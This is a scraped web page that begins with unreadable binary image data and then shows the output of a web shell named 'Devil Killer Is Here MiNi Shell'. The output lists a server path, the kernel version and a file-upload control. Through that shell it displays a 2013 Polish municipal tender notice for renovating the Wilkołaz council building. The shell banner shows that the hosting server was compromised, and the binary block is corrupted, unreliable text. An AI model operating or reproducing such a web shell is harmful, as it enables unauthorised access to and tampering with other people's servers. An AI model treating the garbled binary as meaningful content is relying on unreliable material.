JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130514/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130514/187930-N-2013.html

<p class="kh_header"><b>Wilkołaz Pierwszy: Termorenowacja budynku Urzędu Gminy Wilkołaz wraz z wymianą instalacji centralnego ogrzewania</b><br>
<b>Numer ogłoszenia: 187930 - 2013; data zamieszczenia: 14.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Wilkołaz , 9, 23-212 Wilkołaz Pierwszy, woj. lubelskie, tel. 081 8212001, 8212035, faks 081 8212695.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wilkolaz.lubelskie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Termorenowacja budynku Urzędu Gminy Wilkołaz wraz z wymianą instalacji centralnego ogrzewania.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres robót:
1. Wymiana pokrycia dachowego  z eternitu  na blachodachówkę  bez naruszania konstrukcji więźby dachowej.
2. Nasączenie istniejącej  więźby dachowej do stanu NRO.
2. Wykonanie  instalacji odgromowej.
3. Wymiana stolarki okiennej i drzwiowej 
4. Docieplenie ścian styropianem samogasnącym  gr. 15 cm, i 10 cm ścian fundamentowych metodą mokrą z wyprawą tynkową.
5. Docieplenie styropianem  stropu nad ostatnią  kondygnacją użytkową styropianem gr. 25 cm wraz z  wykonaniem warstwy zabezpieczającej  w postaci szlichty cementowej gr. 5 cm.
6. Ułożenie opaski  kapilarnej.
7.  Wymiana wewnętrznej instalacji  centralnego ogrzewania bez wymiany pieców gazowych w  nowej części  budynku Urzędu Gminy  Wilkołaz.
8. Wymiana wewnętrznej instalacji  centralnego ogrzewania bez wymiany pieców gazowych w  starej  części  budynku Urzędu Gminy  Wilkołaz.

  
Szczegółowy zakres przedmiotu zamówienia został opisany w załączonej  dokumentacji technicznej .


Roboty towarzyszące oraz tymczasowe nie objęte dokumentacją projektową i przedmiarem robót konieczne do uwzględnienia:
            a) organizacja i zagospodarowanie placu budowy wraz z zapleczem budowy ,
	b) zabezpieczenie terenu przed dostępem osób trzecich,
	c) wykonanie robót tymczasowych,
            d) nadzór nad mieniem,
            e)  wybudowanie, utrzymanie i likwidację objazdów/przejazdów i organizacji ruchu na czas trwania budowy,
            f) utrzymanie porządku w trakcie prowadzenia robót oraz uporządkowanie po zakończeniu robót,
	g) natychmiastowe docelowe i skuteczne usunięcie wszelkich szkód i awarii spowodowanych przez wykonawcę w trakcie realizacji robót,
           h) opracowanie i przekazanie zamawiającemu dokumentacji odbiorowej,
           i) czynny udział w odbiorach,.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.26.14.10-1, 45.24.10.00-4, 45.26.14.20-4, 45.44.21.00-8, 45.23.32.22-1, 45.31.12.00-2, 45.33.11.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Oferta musi być zabezpieczona wadium w wysokości: 10 000.00 PLN (słownie:  dziesięć tysięcy złotych 00/100 PLN)
2.	Wadium może być wnoszone w jednej lub kilku następujących formach:
1)	pieniądzu
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3)	gwarancjach bankowych;
4)	gwarancjach ubezpieczeniowych;
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.).
3.	Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy zamawiającego:
BS Ziemi  Kraśnickiej Oddział Wilkołaz 41871710352002200001430004
z dopiskiem na blankiecie przelewu - wadium na  budowę wodociągu Ostrów, gm. Wilkołaz.
4.	Wadium wniesione w innej formie niż w pieniądzu należy złożyć w formie oryginału razem z ofertą w osobnej kopercie. Z treści gwarancji (poręczenia) musi jednoznacznie wynikać, jaki jest sposób reprezentacji gwaranta. Gwarancja musi być podpisana przez upoważnionego (upełnomocnionego) przedstawiciela gwaranta. Podpis winien być sporządzony w sposób czytelny umożliwiający identyfikację (np. złożony wraz z imienną pieczątką lub czytelny z podaniem imienia i nazwiska). Z treści gwarancji winno wynikać nieodwołalne i bezwarunkowe, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 4a i 5 ustawy Pzp.
5.	Wadium musi zostać wniesione przed upływem terminu składania ofert. Oferta niezabezpieczona akceptowaną formą wadium zostanie odrzucona.
6.	Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 4a ustawy Prawo Zamówień Publicznych.
7.	Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego.
8.	Zamawiający zwraca niezwłocznie wadium, na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
9.	Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium na podstawie art. 46 ust. 1 ustawy Prawo Zamówień Publicznych, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego.
10.	Jeżeli wadium wniesiono w pieniądzu, zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę. 
11.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Prawo Zamówień Publicznych, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy Prawo Zamówień Publicznych, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
12.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
1)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
2)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	oświadczenie wykonawcy o spełnieniu warunków udziału w postępowaniu o zamówienie publiczne - zgodne w swej treści z wzorem określonym w załączniku nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek  ten uważać się  będzie za spełniony, jeżeli złożone zostanie wymagane oświadczenie o  spełnieniu warunków udziału w postępowaniu art. 22 ust. 1
         oraz Wykonawca wykaże się wykonaniem w ciągu ostatnich pięciu lat przed upływem    
         terminu składania ofert, a jeżeli okres   prowadzenia działalności jest krótszy - w tym 
         okresie, wykonał co najmniej  dwie roboty budowlane  w zakres których wchodziło 
        wykonanie co najmniej:  docieplenia ścian, zmiana lub wykonanie  pokrycia dachowego, 
        wykonanie lub  wymiana instalacji  centralnego ogrzewania  o wartości nie mniejszej   
        niż 400.000,00 zł każda , z podaniem ich rodzaju i wartości, daty i miejsca wykonania   
       wraz z załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie 
        z   zasadami sztuki budowlanej i prawidłowo ukończone,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek  ten uważać się  będzie za spełniony, jeżeli złożone zostanie wymagane 
         oświadczenie o  spełnieniu warunków udziału w postępowaniu art. 22 ust. 1
         oraz Wykonawca  wykaże, że  dysponuje osobami zdolnymi do wykonania zamówienia  
         w tym: co najmniej jedną osobą   posiadającą uprawnienia budowlane w zakresie 
         kierowania robotami  budowlanymi  w zakresie robót konstrukcyjnych oraz robotami 
         instalacyjnymi  ( zał. nr 6).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek  ten uważać się  będzie za spełniony, jeżeli złożone zostanie wymagane 
         oświadczenie o  spełnieniu warunków udziału w postępowaniu art. 22 ust. 1
oraz:  
- Wykonawca  wykaże, że  dysponuje środkami własnymi lub zdolnością kredytową na kwotę nie mniejszą niż  400.000,00 zł.
         - Wykonawca wykaże, ze dysponuje  ubezpieczeniem od odpowiedzialności cywilnej w zakresie prowadzenia działalności gospodarczej związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 400 000,00 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Wydłużenie terminu wykonania zamówienia:
            a)spowodowanego wystąpieniem niekorzystnych warunków pogodowych nie pozwalających  
                na wykonywanie dostaw np.  długotrwałe, intensywne opady deszczu, długotrwałe niskie 
                temperatury, powodzie lub wystąpienia innych  obiektywnych okoliczności  niezależnych 
               od Wykonawcy,
            b) spowodowanej opóźnieniem w przekazaniu placu budowy ze względu na zbyt późne  
              podpisanie umowy na dofinansowanie zadania, w tym przypadku nowy termin ustali 
             Zamawiający w uzgodnieniu z inspektorem nadzoru.
        
        2. W uzasadnionych przypadkach ( np. choroba, nieplanowany urlop itp.) dopuszcza się zmiany 
           postanowień umowy dotyczące powierzenia wykonania przedmiotu zamówienia innym    
           osobom  niż wskazane w ofercie na osoby o porównywalnych kwalifikacjach i doświadczeniu 
           zawodowym  jakie  wymagał  Zamawiający lub wyższych.
       3. Konieczność wprowadzenia zmian będzie następstwem zmian prawnych lub zmian 
           wprowadzonych w umowie pomiędzy  Zamawiającym a inna niż Wykonawca stroną.
       4. W przypadku przekształcenia podmiotowego Wykonawcy.
       5. W przypadku zmiany  Podwykonawcy. Jeżeli  jednak Wykonawca opierał się na zasobach 
            podmiotu trzeciego ( wspomnianego  Podwykonawcy) wykazując spełnienie warunków   
            udziału w postępowaniu zmiana Podwykonawcy  może nastąpić na taki, który wykaże  
            spełnienie warunków  w zakresie nie mniejszym niż podmiot ( Podwykonawca) wskazany na 
           etapie postepowania o udzielenie zamówienia publicznego.
       6. Zmiana postanowień umowy w związku z zaistnieniem okoliczności powodującej, że 
           wykonanie  części  lub całości  przedmiotu umowy nie leży w interesie publicznym.
       7. W przypadku gdy wykonanie umowy nie leży w interesie publicznym wynagrodzenie 
           przysługujące Wykonawcy zostanie pomniejszone, przy czym Zamawiający zapłaci za  
           wszystkie spełnione świadczenia oraz udokumentowane koszty, które Wykonawca poniósł w  
          związku z wynikającymi z umowy planowanymi świadczeniami.
       8. Zmiana stawki i koty podatku VAT

     2. W przypadku robót budowlanych Zamawiający  przewiduje ponadto zmiany następujące:

        2.1.Zmianie rozwiązań technicznych w dokumentacji projektowej wykonania zamówienia:
          a) na wniosek Wykonawcy, za zgodą Zamawiającego w trakcie prowadzenia inwestycji, mogą    
              być dokonywane zmiany technologii wykonywania elementów robót; dopuszcza się je tylko  
              w przypadku gdy, proponowane przez niego rozwiązanie jest równorzędne lub lepsze  
              funkcjonalnie od tego, jakie przewiduje projekt, a Wykonawca nie będzie żądał zwiększenia  
             wynagrodzenia za wykonywane roboty; w tym przypadku Wykonawca przedstawia projekt  
             zamienny zawierający opis proponowanych zmian wraz z rysunkami; projekt wymaga  
             zatwierdzenia przez nadzór autorski /projektanta/, uzgodnienia z inspektorem nadzoru i  
             akceptacji Zamawiającego; 
        b) w przypadku, gdy wystąpią roboty dodatkowe nie objęte zamówieniem podstawowym 
            niezbędne do jego prawidłowego wykonania, których wykonanie stało się konieczne na  
           skutek sytuacji niemożliwej wcześniej do przewidzenia i nie mające wpływu na termin  
           zakończenia zamówienia podstawowego, Zamawiający udzieli dodatkowego zamówienia na  
           ich wykonanie w trybie wynikającym z ustawy - Prawo zamówień publicznych; zmiana może  
           dotyczyć tylko zmian technicznych w dokumentacji projektowej, 
       c) w przypadku, gdy wystąpią roboty dodatkowe nieprzewidziane w dokumentacji projektowej  
           lub kolizje nie objęte zamówieniem podstawowym, a konieczne do wykonania przed robotami  
           podstawowymi Zamawiający złoży dodatkowe zamówienie na ich wykonanie w trybie  
           wynikającym z ustawy - Prawo zamówień publicznych; zmiana będzie dotyczyć zmian 
           technicznych w dokumentacji projektowej i terminu zakończenia zamówienia podstawowego,  
       d) w uzasadnionych przypadkach, gdy realizacja zadania według dokumentacji technicznej i SST 
          powodowałoby wadliwe wykonanie przedmiotu umowy dopuszcza się wprowadzenie zmian w 
          stosunku do dokumentacji projektowej bez zmiany terminu zakończenia robót,
      e) w przypadku, gdy z punktu widzenia Zamawiającego zachodzi potrzeba zmiany rozwiązań 
          technicznych nie przewidzianych w umowie, sporządza on protokół konieczności, a następnie 
          dostarcza dokumentację projektową na te roboty; zmiany techniczne mogą powodować zmianę 
          terminu zakończenia zamówienia podstawowego.

2.2.  Zmianie dotyczącej zakresu robót i wynagrodzenia, jeżeli wystąpią:
       a) nieprzewidziane kolizje z robotami prowadzonymi równolegle przez inne podmioty; w takim 
           przypadku zmiany w umowie zostaną ograniczone do zmian powodujących uniknięcie lub  
           usunięcie kolizji jak: zmiana sposobu wykonania, materiałów, technologii, lokalizacji 
          wbudowywanych urządzeń oraz zmiana terminu i wynagrodzenia,
       b)okoliczności powodujące  zmniejszenie zakresu przedmiotu zamówienia; w przypadku  
          zmniejszenia zakresu przedmiotu  zamówienia przez Zamawiającego, wynagrodzenie należne  
         Wykonawcy za wykonane roboty pozostaje w takim stosunku do umownego wynagrodzenia, w 
          jakim wykonane roboty  budowlane pozostają do całości robót określonych umową.  
    2.3. Zmiana terminu spowodowana wstrzymaniem budowy przez właściwy organ z przyczyn nie   
         zawinionych przez Wykonawcę.
    2.4. Wydłużenie terminu wykonania umowy w związku z koniecznością wykonania robót 
         uzupełniających, dodatkowych lub zamiennych wynikłych w trakcie realizacji robót i  
         wystąpienia  okoliczności powodujących konieczność zmiany terminu wykonania robót  
         podstawowych.
   2.5. Zmiana sposobu lub zakresu wykonania robót w przypadkach zmiany przepisów skutkiem  
        czego  jest konieczność przyjęcia odmiennych rozwiązań niż założono w dokumentacji  
       projektowej.
  
3.	Wykonawca wnioskujący o zmianę umowy, przedkłada Zamawiającemu pisemne uzasadnienie konieczności wprowadzenia zmian umowy. O  wystąpieniu okoliczności mogących wpłynąć na zmianę umowy Wykonawca  winien jest  poinformować Zamawiającego pisemnie.
4.	Nie stanowi zmiany umowy w rozumieniu art. 144 prawa zamówień publicznych  zmiana danych związanych z obsługą organizacyjno-administracyjną umowy ( zmiana numeru konta bankowego, zmiana danych teleadresowych, zmiana osób wskazanych do kontaktów między stronami).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
